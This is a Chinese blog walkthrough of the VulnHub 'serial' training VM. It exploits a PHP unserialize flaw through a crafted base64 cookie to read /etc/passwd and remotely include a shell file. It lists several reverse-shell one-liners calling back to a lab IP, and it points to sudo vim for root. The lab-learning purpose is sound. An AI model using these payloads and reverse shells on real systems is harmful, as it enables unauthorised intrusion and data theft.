vulnhub serial讲解

已于 2022-12-14 17:58:35 修改
阅读量1.7k 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: 安全
于 2022-12-14 09:01:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/128303476
版权

目录

环境搭建

下载

漏洞过程详解

1.信息收集

2.爆破目录

3.文件分析

4.反弹shell

环境搭建

下载

https://download.vulnhub.com/serial/serial.zip

 

你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。

 

 

这里就是使用我们刚才下过来的。

 

漏洞过程详解

1.信息收集

netdiscover -i eth0 -r 10.140.98.0/24

nmap通常我喜欢使用sS参数,它相对其他参数扫描速度更快且更加隐蔽,而且不会扫崩一些端口,有80端口访问网页看一下。

 

这里访问已经提示了cookie,这里查看cookie看一下。

F12拦包,这里查看一下,请求头中的cookie,有user这个参数,首先这个名字就有点问题了吧,哈哈哈,接下来就是看内容,大写字母小写字母数字最后一个%3D明显就是等号,这里就可以大胆猜测这是base64编码后的一串字符串。

这里解出来很明显就是一串PHP序列化字符串,那肯定是有文件让你分析的,这里找找没有找到,准备爆破目录。

2.爆破目录

这里使用dirsearch爆破目录,这里访问/backup

这里我们得到了,三个文件这里分析一下。

3.文件分析

这里我们看这三个文件

 index.php

<?php
	include("user.class.php");

	if(!isset($_COOKIE['user'])) {
		setcookie("user", base64_encode(serialize(new User('sk4'))));
	} else {
		unserialize(base64_decode($_COOKIE['user']));
	}
	echo "This is a beta test for new cookie handler\n";
?>

 user.classs.php

<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

 log.class.php

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

         这里分析一下index.php通过cookie会base64解密一次然后进行反序列化,然后 user.classs.php,这里看到他include("log.class.php");。

        这里先观察 log.class.php,这里发现了include这个可以这个好,而且可以我们自己定义他读取文件或者远程命令执行。

        查看他这是定义了一个handler方法,看看那里定义这个方法, user.classs.php中有$this->wel->handler($this->name);,这里修改__construct魔术方法中的$this->wel = new Welcome();为$this->wel = new Log();就可以了。

exp

log.class.php

<?php

  class Log
  {
      private $type_log="/etc/passwd";

      public function __costruct($hnd)
      {
          $this->$type_log = $hnd;
      }

      public function handler($val)
      {
          include($this->type_log);
          echo "LOG: " . $val;
      }
  }

user.class.php

<?php

  include("log.class.php");

  class Welcome
  {
      public function handler($val)
      {
          echo "Hello " . $val;
      }
  }

  class User
  {
      private $name;
      private $wel;

      public function __construct($name)
      {
          $this->name = $name;
          $this->wel = new Log();
      }

      public function __destruct()
      {
          //echo "bye\n";
          $this->wel->handler($this->name);
      }
  }
  $a = new User('adsf', 'asfd');
  $b = urlencode(serialize($a));
  $c = str_replace('%00', '%5Cx00', $b);
  echo urldecode($c)."\n";

这里得到

O:4:"User":2:{s:10:"\x00User\x00name";s:4:"adsf";s:9:"\x00User\x00wel";O:3:"Log":1:{s:13:"\x00Log\x00type_log";s:11:"/etc/passwd";}}

这里选择在线网站加密,发现修改cookie以后,并没有没有回显这里解密一下看看。

发现其实这里并没有被解析,这里是因为 private私有的缘故,会有不可见字符,这里用\x00替换了,但是发现这里并没有被解析,感觉是网站加密有问题,这里直接使用python来加密。

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjQ6ImFkc2YiO3M6OToiAFVzZXIAd2VsIjtPOjM6IkxvZyI6MTp7czoxMzoiAExvZwB0eXBlX2xvZyI7czoxMToiL2V0Yy9wYXNzd2QiO319

这里再重新解密,发现这里解析了。

 

cookie传
payload:user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjQ6ImFkc2YiO3M6OToiAFVzZXIAd2VsIjtPOjM6IkxvZyI6MTp7czoxMzoiAExvZwB0eXBlX2xvZyI7czoxMToiL2V0Yy9wYXNzd2QiO319

 使用hacker就可以

​ 

 既然测试可以,这里就尝试远程包含,这里在本地搭建一个网站,在网站根目录下面写一个shell.txt,这里我原本使用的shell.php但是没有成功,之后想想应该是他远程包含,访问这个站但是php是后端语言所以前端是没有的,但是有的人疑惑为什么txt会可以,因为include是按php执行的。

 

O:4:"User":2:{s:10:"\x00User\x00name";s:4:"adsf";s:9:"\x00User\x00wel";O:3:"Log":1:{s:13:"\x00Log\x00type_log";s:30:"http://10.140.98.245/shell.txt";}}

payload:user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjQ6ImFkc2YiO3M6OToiAFVzZXIAd2VsIjtPOjM6IkxvZyI6MTp7czoxMzoiAExvZwB0eXBlX2xvZyI7czozMDoiaHR0cDovLzEwLjE0MC45OC4yNDUvc2hlbGwudHh0Ijt9fQ==

4.反弹shell

 这里我们尝试反弹shell,这里尝试了。

nc 10.140.98.245 4444 -e /bin/bash

bash -i >& /dev/tcp/10.140.98.245/4444 0>&1

/bin/sh 0</tmp/backpipe | 10.140.98.245 4444 1>/tmp/backpipe

mknod backpipe p && telnet 10.140.98.245 4444 0<backpipe | /bin/bash 1>backpipe

上面都不行,下面这个可以。

php -r '$sock=fsockopen("10.140.98.245",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
url编码一下
php%20-r%20%27%24sock%3Dfsockopen%28%2210.140.98.245%22%2C4444%29%3Bexec%28%22/bin/bash%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.140.98.245 4444 >/tmp/f
url编码一下
rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%2010.140.98.245%204444%20%3E/tmp/f

whoami看一下,额是一个低权限用户。。

在根目录发现一个文件credentials.txt.bak

通常我们都对bak这种后缀的比较敏感,这种通常都是一些备份文件。

这里我们得到了sk4用户这个密码。

还是没有权限。

这里sudo -l发现一个好东西 NOPASSWD: /usr/bin/vim

 这里输入命令sudo vim

 

练习两年半的篮球选..哦不对安全选手
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1339
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
[Vulnhub] serial-php反序列化漏洞
weixin_45605352的博客
05-05 753
0x01 环境搭建 漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开 创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 0x02 漏洞复现 探测主机存活及端口 用nmap探测主机存活,探测到存活主机192.168.1.111,开放了22端口和80端口: nmap -PS -T4 192.168.1.0/
vulnhub-serial靶机缺.vmx文件解决方法
zonei123的博客
01-18 449
https://www.vulnhub.com/entry/serial-1,349/ 官网下载的靶机解压后只有 serial.vmdk文件 Vmware workstation无法直接打开 所以要用记事本自行新建一个.vmx文件 代码如下: .encoding = “UTF-8” displayname = “serial” guestos = “other” virtualhw.version...
vulnhub-serial2-又一次啥也不是的靶机解题
qq_41810304的博客
04-07 218
照例先瞎吹一下: 很长时间没有做靶机了,因为去干开发了。其实也不是,主要是懒,不想做,虽然之前又下了一些新的,下决心要勤快一点,但是都没有做。看着同学们都走到了安全的岗位上,而我走到了开发的岗位上,心里多少会有一些不甘,但是也没办法,还是那句老话:“城里的人想出城,城外的人想进城。”确实,再学校努力学习安全的时候羡慕人家学开发的,后来自己走到了开发岗位上,又开始羡慕起在安全岗位上的同学。就扯这些吧。 这个靶机是我翻硬盘的时候发现的,在我的记忆里好像是19年的时候下的了,因为...
VulnHub系列』serial: 2-Walkthrough
ins1ght的博客
11-10 1893
靶机发布日期:2019年9月27日,难度:中等++。用到了apk逆向和ELF中的ROP技术,web狗(小白)表示伤不起,一路硬刚下来的,求鼓励~
import serial 使用方法
热门推荐
一米阳光
02-15 1万+
import serial python中的串口模块 serial 中常用方法 ser = serial.Serial(0) 是打开第一个串口(实例化一个串口) print ser.portstr 能看到第一个串口的标识,windows下是COM1 ser.baudrate = 9600 设置波特率,当然也可以直接初始化 ser = serial.Serial(‘COM1’...
ansible中serial用法
Man_In_The_Night的博客
03-14 6513
实验环境:ansible2.7 1、默认情况下,Ansible将尝试并行管理playbook中所有的机器。对于滚动更新用例,可以使用serial关键字定义Ansible一次应管理多少主机: - name: test play hosts: webservers serial: 2 gather_facts: False tasks: - name: task one c...
mysql serial 类型_Mysql自增类型serial
weixin_32866779的博客
01-19 3589
最近看前辈们的代码,发现了一个没有接触过的类型:serial。下面是关于serial的官方介绍:SERIAL is an alias for BIGINT UNSIGNED NOT NULL AUTO_INCREMENT UNIQUE.SERIAL DEFAULT VALUE in the definition of an integer column is an alias for NOT NU...
Serial
03-17
Serial.pdf 介绍了关于Serial的详细说明,提供其它产品的技术资料的下载。
avast serial
07-02
avast serial
serial-test
11-18
在IT领域,串口通信(Serial Communication)是一种基础但至关重要的技术,广泛应用于各种设备间的通信,例如嵌入式系统、单片机、PC等。本文将深入探讨"serial-test"这一主题,它是一个用于串口自收自发测试的演示...
c++跨平台串口库serial
06-01
**C++跨平台串口库Serial** 在C++编程中,与硬件设备进行通信时,串口通信是一种常见的方法,特别是在嵌入式系统和物联网(IoT)应用中。`serial`库是一个强大的C++库,它允许开发者在多个操作系统上进行串口通信,...
Web Serial Debug
01-10
在线体验: https://itldg.github.io/web-serial-debug/ 国内体验: https://itldg.gitee.io/web-serial-debug/ 开源地址:https://github.com/itldg/web-serial-debug
如何安全的申请SSL证书
2401_86337938的博客
07-22 1558
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 705
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2588
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1018
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
【SCI顶级】金豺算法GJO-CNN-LSTM-Multihead-Attention温度预测【含源码 5741期】.zip
最新发布
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
Linux USB-SERIAL驱动详解与代码分析
"USB-SERIAL驱动的协议与代码解析" USB-SERIAL驱动是Linux内核中的一个关键组件,主要用于将USB设备转换为串行通信接口,如TTY设备。这个驱动广泛应用于各种USB到串口的适配器,使得通过USB接口进行串行通信成为...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值